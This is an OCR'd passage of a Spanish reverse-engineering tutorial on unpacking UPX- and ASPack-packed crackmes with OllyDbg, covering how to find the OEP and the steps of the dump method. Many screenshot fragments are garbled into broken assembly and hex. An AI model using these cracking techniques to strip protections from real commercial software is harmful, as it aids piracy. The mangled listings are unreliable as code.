E ld PTR DS: [ESI] 


Dr 


pa 
o 
m 
o 
pu 


de 
DO 


y 


Du 
[a] 
0 
mm 
ou 
XX 
m 
Laa] 
x 


Dl 


=: 
o 
L= 
m 
D 
Xx 


»1 


D 
[mm] 
o 
m 
[11] 
xXx 
m 
[na] 
x 


MOU EBX, DWORD PTR DS: [ESIJ 
SUB ESI,-4 
ADC EBx,EBx 
ADC EAX, EAx 
DD EBx,EBx 


D 


o 
DOS 


MOU EBX,DWORD PTR DS: [ESI] 
SUB ESI,-4 


D 
[m] 
o 
m 
[11] 
x 
m 
[11] 
x 


x 
o 
pra] 
m 
o 
x 
m 
o 
Xx 


a 


aaa 
LbbLAAAAA Ass 


y] 
TWC 
Fw 
mím 
DOD 
IDX 
0_0w 


dada 


Y 
Xm 
Oz 
DO 
mm 
Du 
Xi 
= 
_ 
1 
al 
—. 
—_ 
A 
e] 


Dí 
E: 
o 
.= 
D 
LE 
[as] 
<= 
pl 
m 
e] 
pr 
pa] 
o 
117] 
. 
rm 
m 
un 
1] 
uu 


z 
3 
= 
m 
wm 
mr 
m 
D 
ES 


D 
[] 
o 
m 
[12] 
Xx 
m 
[12] 
x 


1 
DOE 


y 


MOU EBX, DWORD PTR DS: [ESI] 
SUB ESI,-4 


ADC EBX,EBx 
ADC Elx, ECx 
DD EBx,EBx 


MOU EBX, DWORD PTR DS: [ESI] 
SUB ESI,-4 
ADC EBX, EBx 


DO 


SOSOO 
A A 
D 


D 
mm] 
o 
m 
O 
XxX 
m 
o 
Xx 


E. 
z 
5 
n 
3 
Xx 


Seguimos bajando hasta que vemos 


La 


CMP AL, 1 


aaa 


] 


mí 
Dí 
DE 


DI 
DO 


id 
BEREBER EEDEO DEBE AAA AAA AAA AAA 


DOE 
DO 
DOE 


MOU_EAX; EBX 


DO 
Fada 
DI 


ADD EBx,ESI 


DD 
DO 
DOE 


3307 us 
A 53950001 


Y 


E 
E O OOOO, 


DD 


o] 

por 

o 
> 


y 


MOU ECX, EDI 
PUSH EDI 


DOE 


DIS 
PRLARARARADRADA RL 


55 
FF96 S5CI9SB0BÍ 
Baca 


OR ERAX, ERX 


< 


ADD EBX 


LOC 


y 


Y 


Wu 


E 


BC72FFFF 


1 
a] 
Ñ 
mo 
Du 


Y 


DO 
DO 


Este es un packer muy inocente, vemos que arranca hace sus desencriptaciones y cuando termina 
todo su trabajo salta al OEP, sin ni siquiera ocultarlo, al ver los packers actuales da un poco de risa 


ver esto aun, pero bueno, asi trabaja. 


O sea que si pongo un BP en ese JMP 


61 
CIESIBEREREER 
112 


lla] 
lla] 
[Js] 
AA 


DOE 
ooo 
000 
paa] 
So 


Alli paro y como termino de arreglar la primera seccion, salta al OEP o la primera linea original de 


codigo apretemos F7. 


A a 


a 
Ec 
17] 
25 
m 
[11] 
= 


mou E PTR DS: [EBXJ],EAX 


CMP BYTE PTR DS: [EDIJ,0 


MOU EAX, DWORD_PTR DS: CEDIJ 
MOU BL,BYTE PTR DS:[EDI+4] 


D 
mm] 
o 
m 
o 
. 
in 


E2 
SOBE 00700001 LEA EDI,OWORD PTR DS: [ESI+7000] 
3Bo7 MOU_EAX, DWORD PTR DS: CEDIJ 


[mu] 
ra] 
m 
D 
x 
mm. 
D 
x 


SBSF 04 MOU EBXx, DWORD PTR DOS: CEDI+4] 
Ea EO9401 LEA EAX, DWORD PTR DS: CEAX+ESI+94E6] 


XODmvU 
ODOC 
ICON 
m Es 
m 
moaDom 
DE-D 
X x 
00 
m 
[11] 
TU 


MOU AL,BYTE PTR DS: [EDI] 


Dh 
DI 
(e) 
D 
Fm 
o 
Dn 
E 


DEC EAX 
REPNE_SCAS BYTE PTR ES: [EDI] 


MOU DWORD PTR DS: [EBX],EAXx 
ADD EBX,4 


a] 3 A E A E 25 2 29 Y Y 


SALTO AL OEP 


==) 5874 


aX] »]1] vit: $13) 9) +: LJEJM|T¡WH|C]/|KjB|R]--J5] :=/33 7] 


JMP to kerne132.GetModu leHandleA 


6A BB 
004015052 ES FFO4000B 
00461 As Caza4aBa MOU DWORD PTR DS: [4026CA],EAX 
66491900 5A Ba PUSH 
0040100E 63 F4204000 PUSH CRACKME_. 104020F4 ASCII "No need to disasm the codet” 
604015013 Es A604000B JMP to USER32.FindlindowA 
Bn4B1613S BECA OR EAX, EAX 
BB4B1B1A|" 74 Bl 
Ba4B1B1C C3 


664B1610|  C7O5S 64204000 DWORD PTR DS: [402064], 4003 

ou4B1027|  C765 63204000 DWORD PTR DS: [402068], CRACKME_. 6048 
00401 Cros 6C204000 DWORD PTR DS: [40206CJ,0 

004561 Cros 70204000 DWORD PTR DS: [402070],0 


00401045 al caAzo4ana EAX, OWORD PTR DS: [4026CA] 

00401044 74204000 MOU DWORD PTR DS: [402074], EAXx 

0040104F 64 H 64 

600461051 PUSH EA% 

00401052 D1030000 JMP to USER32.LoadIconA 
10401957 73204000 MOU DWORD PTR DS: [402078],EAXx 

BB4B1B5C BO7FOBOn PUSH 7FOB 

00401061 [12] PUSH O 


Ahi vemos el OEP con el mismo codigo que el Cracme de Cruehead original, el desempacador 
termino su trabajo y desencripto todo el codigo original, que como habiamos visto en un inicio no 
estaba alli, pues todo esto eran ceros, y una vez que termino salto al OEP, para empazar a correr el 
programa. 


Este esquema de funcionamiento de un programa empacado 


1)EJECUCION DEL DESEMPACADOR 

2)REPARACION Y DESENCRIPTADO DE LA SECCION DONDE CORRE EL CODIGO 
ORIGINAL 

3)SALTO AL OEP 

4)EJECUCION DEL PROGRAMA 


Ha sido un esquema que ha funcionado durante años y muchisimos packers trabajan asi, con el 
tiempo los programadores de packers se han dado cuenta que debian modificar un poco el esquema 
y han agregado ardides para ocultar el OEP, y otro trucos que veremos mas adelante, pero 
normalmente el funcionamiento general es ese. 


Reinicio el CRACKME UPX 


Obviamente si la primera seccion estaba vacia como en este caso o tenia basura y alli se contruye el 
codigo original, debera escribir en dicha seccion, por lo cual si uso un BPM ON ACCESS en la 
misma, parara en la rutina que desencripta el codigo veamos. 


Vayamos a M 
ptas REA 
VUScCuUuDO] DODOFD0O FEV] Fw ru 
BO3F0000 | BOBBZ2000 Map ¡R R 
60400000 | 00001000 / CRACKME_ PE header Imag R RWE 
60401000 09663000 CRACKME_ UPXO exports Imag R RWE 
60409000 / 606061000 | CRACKME_ | UPX1 code Imag¡R RWE 
60404000 | 000601000/ CRACKME_| .esro data, import; Imag|R RWE 
90410000 | OOBBADOD Map ¡RE RE 
60400000) 000020008 Map [RE RE 
ARIFARAR! AAIAZARA Man ¡iR R 


Vemos que las secciones han sido cambiadas en tamaño con respecto al original, el cual vemos sus 
secciones abajo. 


ID IIS nap, 


e] 
> 


AS 


BO3E0000 | 0OBB4BDA Priv! Ru Ru 
BO3F0000| BOBBZ2000 Map |R R 

500400000 /| 009001000 | CRACKME PE header Imag|R RWE 
60401000 60001600) CRACKME | CODE code Imag/R RWE 
60402000 / 60661000| CRACKME | DATA data Imag|R RWE 
50403000 | 009061000| CRACKME |. idata imports Imag|R RWE 
00404000 | 000019006 | CRACKME | .edata EXpPOrts Imag|R RWE 
50405000 | 6009061000| CRACKME | .reloc |relocations| Imag|R RWE 
60406000 | 00BB2000/| CRACKME | ¿esco resources Imag|R RUE 
50410000 | OOBBADOD Map ¡RE RE 
90400000 | 0OBB2000 Map ¡RE RE 


Vemos que la seccion CODE empieza en 401000 y tiene 1000 bytes de largo en el original, 
meintras que en el CRACKME UPX, cambio la seccion CODE a la que empieza en 409000. 


Bueno igual no importa pongamos un BPM ON ACCESS en la primera seccion del empacado a ver 
si para cuando desempacay damos RUN. 


BO63F0000| DOBBZ2000 Map |R R 
00400000| AB0B1000| CRACKME_| PE header | Imag|R RUE 
60401000) 600035900. CRAC” e . ] JE 
50409000 | 0090610006 | CRAC Actualize E 
604094000 | 006061000 | CRAC . E 
60410000 | 00BBADGa Dump in CPU E 
60400000 | 00002000 E 
d0SFO0G0 DasEtono Sl E 
gasas assazado| Search Ctrl+B 
a : 
S2CA1000 | ABBBZARA Set break-on-access F2 E 
53CA4000 | 0001F000 ] E 
203c000s 00801898 COMO Set memory breakpoint on ací » E 
se391000| 00004000 Set memory breakpoint on write É 
TARIBARA! ARRAIRARA! Cab arrace » alF 


NOP 

MOU AL,BYTE PTR DS: [ESI] 
INC ESI 

MOU BYTE PTR DS: [EDIJ,AL 
INC EDI 


ADD SORTEO 
MOU EBX, DWORD PTR DS: [ESI] 
SUB ESI,-4 
ADC_EBX, EBX 


000000 |MOU EAX, 1 

ADD SHOATO 

MOU EBX, DWORD PTR DS: [ESI] 
SUB ESI,-4 


ADC EBX,EBX 
ADC EAX, EAX 
ADD EBXx,EBX 


MOU EBX, DWORD PTR DS: [ESIJ 
SUB ESI,-4 
ADC EBX,EBXx 
20R AE 


Vemos exactamente que para cuando va a guardar AL=6A en 401000, si vemos el original en 
401000. 


[O] File View Debug Plugins Options Window Help 


a] > 1jejm/T]wjH/c]//x]B]R]»..] 


A Ba. PUSH B pModule = NULL 
GetModu leHandleA 
MOU DWORD PTR DS: [4626CA7,EAXx 
PUSH Title = NULL 
PUSH CRACKME. BB4020F4 [ 


a Class = "No need to 
06040000 CALL_<JMP. USER32.FindWindowA> FindilindowA 
OR EAX, ERX 


MOU DWORD PTR DS: [402064], 4003 
MOL DWORD FTR DS: [492068], CRACKME. WndPr 


..... 
mm. 


Vemos que esta guardando el primer byte 6A que el original posee en 401000, si apreto F9 de 
nuevo, deberia guardar el byte siguiente o sea el 00 que esta a continuacion, veamos. 


INC ESI 

MOU BYTE PTR DS: [EDIJ,AL 
INC EDI 

ADD EBX,EBX 

mMOU ES” a PTR DS: [ESI] 


SUB E 
ADC_EBX, EBX 


MOU EAX, 1 
ADD EBX, EBX 


MOU EBX, DWORD PTR DS: [ESI] 
suB ESI,-4 
ADC EBXx, EBX 
ADC EAX, ERX 
ADD EBX, EBX 


MOU EBX,DWORD PTR DS: [ESI] 
SUB ESI,-4 
ADC EBX, EBX 


XOR ECX, ECX 
UB _EAX,3 


SHL EAXx, 8 
MAU_AL,BYTE_PTR_DS:[ES1] 


004510056| 6A 00 00 00 60 66 00 60 66 06 BO 66 66 DO BO BB j..... 


arñmardtairal rafa Cata Cata Cata data (ata (aía (ara (afa (aía faía (aña Cata Cala (ara (ara 


Y asi podemos seguir byte por byte, mientras guarda los bytes desencriptados y reconstruye el 
codigo original, por supuesto no todos los packers desempacan en orden ni desde el inicio como 
este que es buenito, pero vemos el ejemplo de algo lo mas sanito posible para empezar jeje. 


Si nos tomamos el trabajo de tracear veremos que esto es un LOOP donde lee un byte de los 
guardados encriptados, le realiza las operaciones matematicas para desencriptarlo, (sumas, 
multiplicaciones etc por ejemplo) y cuando obtiene el valor original, lo guarda a continuacion del 
anterior. 


Si quitamos el B”PM ON ACCESS, podemos si apretamos ANIMATE INTO, divertirnos viendo 
como se va llenando la primera seccion con los valores originales somo si fuera una pelicula, hasta 
que llega al BPX que pusimos que es el JMP al OEP. 


AL,BYTE PTR DS:[ESIJ 
ESI TA NS.rrat1 mm 


Backup 
Copy 
Binary 
Assemble Space 
Label : 
Comment 


Toggle F2 
Hit trace Conditional Shift+F2 
Run trace »'  Conditiomal log Shift+F4 
Goto » Memory, on access 
Follow in Dump > Memory, on write 
Remove memory breakpoint 
A Search for , Leza saca 
Sons Find references to » Hardware, on execution 


naa Plugins Options Window Help 


Run F9 

Pause F12 

Restart Ctri+F2 

Close AlH+F2 

Step into F7 I- 


Step over Fa AL 
Animate into Ctrl+E? 
Animate over Ctri+F8 ES 


Execute till return Ctri+F9 


Cimmaba Bill sirre carda Alek añ 


Vemos como trabaja el programa desencriptando la seccion CODE 


ADD EBX,EBX 
MOU EBX,DWORD PTR DS: [ESI] 


1 


ADC_EBX, EBX 


MOU EAX, 1 
ADD EBX,EBX 


MOU EBXxX,DWORD PTR DS: [ESI] 
SUB ESI,-4 
ADC EBX,EBX 
ADC EAX, ERX 
ADD EBX,EBX 


o 


10] 
| 
[na] 
m 
mn 
— 
La 


.o xn 
ES 


Ao... 


e 


< 


MOU EBX,DWORD PTR DS: [ESI] 
SUB ESI,- 
ADC EBX,EBX 


XOR ECX, ECX 
SUB _EAX,3 


SHL EAX, 
MOU AL,BYTE PTR DS:[ESI] 
INC ESI 

XOR_EAX, FFFFFFFF 


MOU EBP, ERX 
ADD EBX,EBX 


MOU EBX, DWORD PTR DS: [ESI] 
SUB ESI,-4 


ADC EBX,EBXx 
an 


> 


. an 


F 
m 
co 


Jump is NOT taken 
BB4B9CSOCRACKME_. 00409050 


ao 


bhbhfththti 
DDD 


Arriba vemos moviendose y ejecutandose al desempacador transpirando la camiseta en un loop, 


mientras va llenando la primera seccion de valores originales, hasta que termina y llega al JMP al 
OEP. 


Una vez que para en el JMP estamos nuevamente a un pasito del OEP apretamos F7 


Ll] run “IS LED PUES MALIDA IS YM II ap 


CALL CRACKNE_.00491596 


e era id PTR DS: [4620CA],EAX 
63 F4204000 PUSH CRACKME .DO4B20F4 ASCII "No need to disasm the codet" 
Es A6040000 JMP to USERS2.FindlindowA 

Bl OR ERX, ERX 


c3 
Cr65 64204000 1MOU DWORD PTR DS: [402064], 4003 
Cros 63204000 ¿MOU DWORD PTR DS: [402068], CRACKME_. 0040 
Cros 6Cc204000 1MOU DWORD PTR DS: [40206CJ,0 

Cros 70204000 1MOU DWORD PTR DS: [402070],0 

Al CA204000 MOU EAX, DWORD PTR DS: [4626CA] 

En roiei MOV DWORD PTR DS: [402074], EAX 


JMP to kernel132.GetModu leHandleA 


50 
Fa MiacaRnaA PFoli FROFKME  arRdA1IA?a ¿IMP ta 1ISFR22 | nadien Ol 


Alli estamos en el OEP, porque decimos que no podemos cambiar con OLLYDBG el codigo y 
guardarlo como lo hacemos habitualmente, jeje. 


Si yo por ejemplo agarro los dos primeros bytes 6A 00 y los quiero cambiar por ejemplo por 90 90, 
y trato de guardar los cambios OLLYDBG me despierta con un 


Error h 


Q Unable to locate data in executable File 


O sea que no puedo hacer eso, porque OLLYDBG no encuentra el codigo en el ejecutable, para 
cambiarlo. 


Pero si insisto y con un EDITOR HEXA pongo 90 90 en 401000 y abro en OLLY el crackme 
modificado, y voy a mirar que hay en 401000, tendre el 90 90 y a continuacion todos ceros, y 
cuando el packer corra y guarde los valores originales en la primera seccion, mis cambios seran 
sobreescritos, por los bytes 6A 00 nuevamente, que el desempacador guardara alli en ejecucion y al 
llegar al OEP en 401000 tendre 6A 00, por mas que en el archivo esten guardados 90 90, han sido 
sobreescritos en tiempo de ejecucion por el desempacador. 


O sea que si yo quisiera cambiar esos dos bytes realmente, deberia buscar donde lee el 
desempacador los bytes originales encriptados, ver que operaciones le aplica para transformarlos en 
originales, asi poder calcular que valor devberian tener ufff, demasiado trabajo mas facil es 
desempacar el archivo asi puedo cambiar lo que se me antoje cuando quiero, jeje. 


Por supuesto hay otras tecnicas para parchear en memoria mediante loaders, que no son motivo de 
esta parte, los loaders cargan el crackme, esperando que se desempaque en memoria y luego hacen 
los cambios en alli mismo en la memoria, para que al correr, encuentre los bytes modificados, pero 
eso es otra historia vamos despacio que despacio se llega jeje ya eso lo veremos mas adelante. 


Bueno aquí termina esta breve y sencilla reseña inicial, en la parte dos continuaremos investigando 
el desempacado del famoso CC. 


Hasta la parte 32 
Ricardo Narvaja 
16/02/06 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 32 


En la parte anterior tratamos de dejar claro el concepto de OEP, o sea la primera linea ejecutada del 
programa original que el 99 por ciento de las veces esta en la primera seccion (aunque aquí en esta 
parte he puesto uno que no esta en la primera sección de molesto que soy jeje) 


Vimos que cuando llegamos alli, y mirabamos la memoria, el contenido es similar al del original, lo 
cual nos da la posibilidad de intentar dumpear y generar el archivo mas parecido posible al original 
para reconstruirlo. 


El metodo clasico seria: 


ENCONTRAR EL OEP 

2)DUMPEAR 

3)REPARAR LA IAT 

4) VERIFICAR SI EL ARCHIVO TIENE ANTIDUMPS O CHEQUEOS QUE LE IMPIDAN 
CORRER Y REPARARLOS 


Este es el metodo clasico que con pequeñas variaciones según el packer, normalmente se utiliza 
como metodo de trabajo, nos enfocaremos en esta parte en los metodos que podemos utilizar para 
llegar al OEP, que pueden funcionar en diferentes packers. 

Hay que decir que muchas veces es necesario probar e intentar, muchas veces estos metodos 
funcionan, otras veces hay packers que evitan que estos metodos funcionen, por lo cual hay que 
usar un poco de inventiva, pero teniendo la idea que cual es el punto a hallar (el OEP) veremos 
como podemos arreglarnos utilizando las herramientas que poseemos. 


Por ahora para explicar utilizare el Crackme de Cruehead empacado, mas adelante veremos otros 
packers, pero en esta explicacion general, el mismo nos servira. 


1) MIRAR O BUSCAR OPCODES EN EL LISTADO MUERTO DEL PACKER ANTES 
DE EJECUTAR 


Esto solo puede funcionar en packers inocentes ni se me ocurriria intentarlo en un asprotect por 
ejemplo jeje, pero a veces sirve buscar los opcodes del JMP LARGO (0E9) o CALL LARGO 
(0E8), pensando que el packer necesitara un salto o call largo a la primera sección para llegar al 
OEP, y rezando que el mismo este presente en el inicio, o sea que no se automodifique el packer 
jeje. 


Pues en este caso seria 


HORTCRACKMEZIO0, Mie crace , 
BX, DWORD PTR DS: 
SI,-4 


Run trace » 


Go to » 


Follow in Dump » 
BX, DWORD PTR DS: [ 
SI,-4 


= » Name (label) in current me 
Find references to > Name in all modules 
0% d Command 
Copy to executable » 
l . Sequence of commands 
¡4 Analysis » 
0 Constant 


5050505 
mot 
Jl 


2|  Appearance » 
arar E : Modified command 


hlarer 


DO 
a] 


Enter binary string to search for 


UNICODE f? 
HEX +01 [E9sl 


[Y Case sensitive Cancel | 


ÍV. Entire block 


Cuando para miro a ver si es un salto a la primera sección y si no es, apreto CTRL+L para que 
busque el siguiente E9. 


A] pens ser .u 


COEN eu) 04 3 al 4 ajejmjrjwjnjc)Jxje 


CHAR "*” 


CHA 
CHAR "+ 
Hago CTRL+L 


NOP 
MOU EAX, DWORD PTR DS: [EDXI 
ADD EDx, 4 


MALA MAA ATA NF.FFnatA Fa 


Empiezo a hallar salto largos que no van a la primera seccion, y asi hasta que llego a 


— 0] vit] $0 y] + LjE 


El cual es un salto a la primera seccion al que le puedo poner un BPX y cuando para apretar f7 y 


estare en el OEP. 


Tambien si uno tiene ganas de buscar en el codigo del packer deberia intentar CALL EAX, CALL; 
EBX, JMP EAX, porque muchos packers utlizan los registros para disimular el salto al OEP, en el 
caso de estos comandos lo bueno es que como son comandos completos los podemos buscar todos 
con SEARCH FOR - ALL COMMANDS y ponerle BPX a todos juntos, veamos un ejemplo. 


3X FOnow In DuUmMp ” 
ER 
4 Mame (label) in current modi 
E Find references to »| Name in all modules 
E nen E Command 
JR Copyto executable » ] F d 
4 Anel Ñ equence of commands 
a Constant 
Appearance » Binary string 
O Modified command 
Next 


BO 60 65 BB[....0044. 
06 a ; a 3 
BB an 
BB AB '=) 
0 00/59 60 ab 
00/00 96 
00/ES BA 


All intermodular calls 


Aa 
ochos Állsequences » 


00 B00|... 


61 6b 


Find all commands 


[CALL ERX r ] 


Cancel 


Y en este caso no sale ningun resultado, pero si hubiera varios resultados que me salen en la lista, 
puedo haces click derecho en los resultados y elegir la opcion de ponerle BPX a todos ellos, y con 
eso tendria la posibilidad de que pare en los mismos, y alli cuando para fijarme en este caso el valor 
que toma EAX y si vemos que es un CALL o JMP a la primera seccion, pues apreto f7 y llego. 


Este metodo de buscar en el listado muerto no es muy utilizado, porque la mayoria de las rutinas 
desempacadoras modernas se automodifica, cuidando especialmente de que la parte del salto al 
OPEP no este visible en el inicio, para evitar este tipo de busquedas, pero bueno, mencionamos la 
posibilidad que en un packer antiguo o malo, puede funcionar. 


2)USAR EL BUSCADOR DE OEPs que trae incluido el OLLYDBG 


Abramos el crackme UPX y vayamos a DEBUGGING OPTIONS-SFX 


ES Debugging options 
Commands | Disasm | CPU | Registers | Stack | ¡Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events | Exceptions | Trace SFX | Strings | Addresses | 


When main module is self-extractable: 
T” Extend code section to include extractor 


(e Stop at entry of selfextractor 


C Trace real entry blockwise (inaccurate) 


—» C Trace real entry bytewise [very slow!) 


[Y' Use real entry fro previous run 
|” Pass exceptions to SFX extractor 


El Undo Cancel | 


Alli vemos las dos opciones que en la pestaña SFX, tiene el OLLYDBG para hallar OEPs, la que 
esta señalada con rojo es la mas rapida, y la que esta señalada con verde es mas lenta aunque puede 
funcionar un poco mejor a veces, probemos, pongamos la tilde en la de la flecha roja. 


Al reiniciar veo que no funciona en este caso, porque es eso, veamos las instrucciones del caso. 


Self-extracting (SFX) files 


Selfextracting file consists of extracting routine and packed original program. When troubleshooting SFX, you usually want to 
skip extractor and stop on the entry point of original program ("real entry"). OllyDbg contains several functions that facilitate this 
task. 


Usually extractor loads to address that is outside the executable section ofthe original program. In this case OllyDbg recognizes 
file as SFX. 


When SFX options request tracing of real entry, OllyDbg sets memory breakpoint on the whole code section. Initialy this is 
empty or contains compressed data. When program attempts to execute some command within protected area which is neither 
RET nor JMP, OllyDbg reports real entry. This is how bytewise extraction works. 


This method is very slow. There is another, much faster method. Each time exception on data read occurs, OllyDbg enables 
reading from this 4-K memory block and disables previous read window. On each data write exception it enables writing to this 
block and disables previous write window. When program executes command within remaining protected area, OllyDbg reports 
real entry. However, when real entry is inside read or write window, its location will be reported incorrectly. 


Veo en la ayuda del OLLYDBG que esto solo funciona cuando OLLYDBG detecta que el Entry 
point esta fuera de la seccion code como en la mayoria de los programas empacados, pero en este 
caso no nos advrtio OLLYDBG de ello, el problema es que UPX cambia la seccion CODE a esta en 
la cual se ejecuta el desempacador, por lo cual el EP esta en la misma seccion CODE y OLLYDBG 
no detecta como que es un empacado y en este caso el metodo no funciona, aunque es raro que un 
packer realice ese cambio, pues aquí no va. 


Pues para poder demostrar como va este metodo, usare otro crackme empacado que adjunto, es el 
crackme empacado con aspack, otro sencillo packer. 


Primero coloco la tilde en su posicion nornal y veo que OLLYDBG me lo reconoce como packer 
según su metodo de ver si el EP esta dentro de la seccion CODE. 


Entry Point Alert 


Module 'UnPackMe' has entry point outside the code (as specified in the PE header). Maybe this file is self-extracting 
or self-modifying. Please keep it in mind when setting breakpoints! 


Y me muestra el cartelito de aviso y al aceptarlo llega al EP. 


Bj x] ej] bijs] $0) +] > LJEjmMT|[wH]c| 


6 
b6Z| — ES 4300009B 
?|- ES EB045D45 


SDODO 
La La E Sa E 
pra po jo po po 
A 

o 


Cc3 
Es 61000000 


Ahora cambio la tilde por la de la flecha roja, me fijo que las tildes en EXCEPTIONS esten 
marcadas para que no pare por excepciones y renicio el programa en OLLYDBG. 


Lommands | Lisasm | LPU— [ Hegisters | btack | Analysis 1 ] Analysis Z | Analysis 3] 
Security | Debug | Events | Exceptions | Trace SFX | Strings | Addresses | 


when main module is self-extractable: 
T Extend code section to include extractor 


O Stop at entry of selfextractor 
(* Trace real entry blockwise (inaccurate) 
A C Trace real entry bytewise [very slow!) 


É 
15 
$ 
É 
É 
É 
É 
É 
É 
15 
É 
É 
É 
É 
É 
É 
15 
h 
( ÍV. Use real entry from previous run 
h 

É 

15 

É 


T Pass exceptions to SFX extractor D 


ES Debugging options (Xx) 
Commands | Disasm | CPU |] Registers | Stack | Analysis 1 | Analysis 2 | Analysis 3 | 
Security | Debug | Events Exceplions | Trace | SFX | Strings | Addresses | 


[Y Ignore memory access violations in KERNEL32 
lgnore [pass to program) following exceptions: 

[4 INT3 breaks 

[Y Single-step break 

[Y Memory access violation 

ÍV Integer division by O 

Y Invalid or privileged instruction 

T” ANFPU exceptions 


ÍW Ignore also following custom exceptions or ranges: 


CO00008F (FLOA4T INEX4CT RESULT] d last e» 
Add range 
Delete selection 


Undo Cancel | 


Doy RUN. 


Vemos que alli para en 404000 que me marca REAL ENTRY POINT OF SFX CODE (aunque no 
esta en la primera seccion ya veremos que este crackme es un caso especial que se desempaca en la 


tercera seccion algo inusual pero posible) 


¡1] rie VIEW UCUUY  FIUQNI>S PLD IIA IS 


a] 44 x] EE sia eje] + ujejmjtiwjnjc]/Jx]6]r]-]s] 5% 


Real entry point of SFX code 


0040400 DBES FINIT 
0040400 9B WAIT 
5 DBE2 FCLEX 
5 7 E a WORD PTR DS: [4060007 


6804945900 B9ES mov EBP. ESP 


e?) 


DRIDIDOF ES 91030000 

Ado9a1a . 68 600909008_|PUSH O pModu le = NULL 
ar4B19| . FF1S F4114001 CALL DWORD PTR DS:[4011F4] GetModu leHandleA 
Ba4B4B1F| . AS M7F64008 |MOU DWORD PTR DS: [40F6077],EAX 

ARIAÍA?AL . ñA PLUSHAN 


En este caso el metodo funciono, ese es el OEP, veamos si tarda mucho mas si hubieramos puesto 
la flecha verde en vez de la roja. 


Reinicio y no tarda muchisimo mas ya que el codigo del desempacador es breve, en ambos casos 
funciono y me dio el OEP correcto. 


Siempre debemos recordar cuando termino de usar este metodo de ir y quitar la tilde y volverla a su 
posicion original, pues si no OLLYDBG no parara en los ENTRY POINTS comunes normalmente 
y siempre buscara parar en OEPs. 


3JUSANDO EL OLLYDBG PARCHEADO PARA BUSCAR OFEPs 


Este es el mismo OLLYDBG que usamos para las partes sobre Visual Basic, que cuando pones un 
BPM ON ACCESS, para solo por ejecucion y no cuando lee y escribe (ON READ o ON WRITE) y 
es ideal para hallar OEPS, veamos el caso del UPX, vayamos a M y miremos las secciones. 


EE EE A 2] 1/elmT[wH/c]/]k/B]Rr]--s] ¿=8/?| 


PUSH EDI 
OR EBP,FEFFFFFF 
JHE SHORT CRACKME_.89489C12 


BO3E0000] 00BB4BBn Priv] Ri Ru 
BO3F0000| BOBB2000 Map |R R 

60400000 | 00BB1000/| CRACKME_ PE header ImagiR RUE 
60401000| ODOBASOGa aid UPRO exports Imag | R RWE 
50409000 | 60961000| CRACKME_ | UPX1 code Imag|R RWE 
60404000 | 00061000/| CRACKME_| .rsro data, import; Imag|R RWE 
50410000 | 0OBBSODa Map ¡RE RE 
50400000 | 00BB2000 Map ¡RE RE 


Alli esta la primera seccion, en ella el desempacador escribira mientras desencripta los bytes 
originales, y no queremos que pare mientras trabaja, ya que si no, parara miles de veces antes de 
llegar al OEP cuando lee y escribe, gracias a este OLLYDBG modificado, no para cuando lee y 
escribe en dicha seccion, si no solo cuando ejecuta, y eso es lo que queremos hallar nosotros, que 
pare en la primera linea que se ejecuta en la primera seccion la cual sera casi siempre el OEP. 


190300000 
DO3ED00B 
DO3FO00B 
00400000 
[215] 


401090 80 


00409000 
0040A000 
00410000 
90400000 
004E0000 
DOSFOD0B 
00900000 
53C30000 
53031000 
53CA1000 
53CA4000 
538CC3000 
r6360000 
r6361000 
7A291 AAA 


als lalala] 
00004000 
000B2000 
900910009 
pasa 
00061006 
000610009 
151512151512] 
00062000 
00103000 
55153351515] 
000562006 
00001000 
00070000 
5151515151] 
g0B1FOGO 
00004000 
000610008 
00030000 
ARRAASARA 


Es 


BB| CRACKME_ 


CRACKME_ 
CRACKME_ 


COMCTL32 
COMCTL32 
COMCTL32 
COMCTL32 
COMCTL32 
COMDLG32 
COMDLG32 
Sama! R32 


«text 
«data 
ISTG 
.«reloc 


«text 
¿Mata 


Map Device 
Priv 
Map 
Imag 


e 
5 


R R 
Ru 0 

3 header | 

Actualize 

Dump in CPU 

Dump 


Search Ctrl+B 


Set break-on-access F2 


Set memory breakpoint on 


Set memory breakpoint on write 


Me fijo en la pestaña EXCEPTIONS que esten todas las tildes marcadas para que no pare por 
EXCEPCIONES, y doy RUN y me voy a tomar unos mates, (café o te para los que no son 
argentinos jeje, aunque yo no tomo mate ju) 


Por supuesto este metodo es un poco mas lento por eso le digo que se tomen unos mates, depende el 
packer puede tardar unos segundos hasta varios minutos. 


Cuando vuelvo de los mates esta detenido en el OEP 


al +] 1Jelmr[wu[c]7[x]8/r]-/s] ¿5/51? 


PUSH A 


77] 
FFO40006 
CA204000 


gu 
F4204000 
O 


C3 
o 


Si lo hago en el aspack 


CALL _CRACKME_.0B401506 JMP to kernel32.GetModu leHandleA 
MOU OWORD PTR DS: [46260CA7,ERAX 


PUSH O 
PUSH RcRME -DO4B20F4 


OR ERX, ERX 


ASCII "No need to disasm the codet” 
JMP to USER32.F ind indowA 


A 


0030000 
004900000 
0401000 
00402000 
00404000 
00406008 
00407000 
00410000 
00411000 
00414000 
00420000 
D04E0000 
004F0000 
l5/515151515] 
77010000 
77011000 
77070000 


Doy RUN 


¡DO DDODOO 


20091900 Priv] Ru Ru 

560001006 | UnPackMe PE header Imag|R RWE 

60001000 UnPackMe . idata Ae 

590002000 | UnPackMe! .rsro TESOUrces Actualize 

00002000 | UnPackMe| .text code 

00001009| UnPackMe| .data code, data Dump in CPU 

60009000 | UnPackMe! .bss code 

60001000 | UnPackMe! IMPORTS | code Dump 

100093000 | UnPackMe| . teddy SFX, imports 

90001990|UnPackMe| .adata Search Ctr 
00002000 

00103000 Set break-on-access F2 
BOBBF600a ——— 
rr pea EN PEE Set memory breakpoint on accerp: 
00002000! user32 «data data A E 


DE 


5 
le fu pu pu E) CE 


A A A 
ho ho 


94 

BA 0100088B 
6A 21 
3E4C5C 83 


AS 


mou 


a 


BB1 


Cc3 

32AA A1900008 |0R CH,BYTE PTR DS: [EDx+90A1 ] 
gob ADD BYTE PTR DS: [ECXJ,AL 
OS PTR ES: [EDI 
XCHG_EAX, ESP 
MOU EDx, 3B93D0B1 
PUSH 21 


MOV CS,WORD PTR SS: [ESP+EBX*2-7D] 
EBX,EBX 


nn rm rra mi 


3,BYTE PTR DS:[ESI 


Segme 


Veo que la primera linea ejecutada es esta, veamos que pasa si apreto f7 


MOU BYTE PTR DS: [EDIJ,0C3 


POP 1 PTR DS: [EDI] 


E 


¡'ST7MOO 


HOU ECX,EAX 


